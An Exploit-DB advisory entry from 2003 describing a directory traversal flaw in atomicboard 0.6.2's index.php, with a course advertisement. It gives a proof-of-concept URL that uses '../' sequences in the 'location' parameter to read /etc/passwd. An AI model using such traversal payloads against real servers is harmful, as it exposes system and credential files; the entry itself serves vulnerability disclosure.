atomicboard 0.6.2 - Directory Traversal

EDB-ID:

22941

CVE:



Author:

gr00vy

Type:

webapps


Platform:

PHP

Date:

2003-07-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/8236/info

It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user.

http://www.example.com/atomicboard/index.php?location=../../../../../../etc/passwd

http://www.example.com/AtomicBoard-0.6.2/index.php?location=anything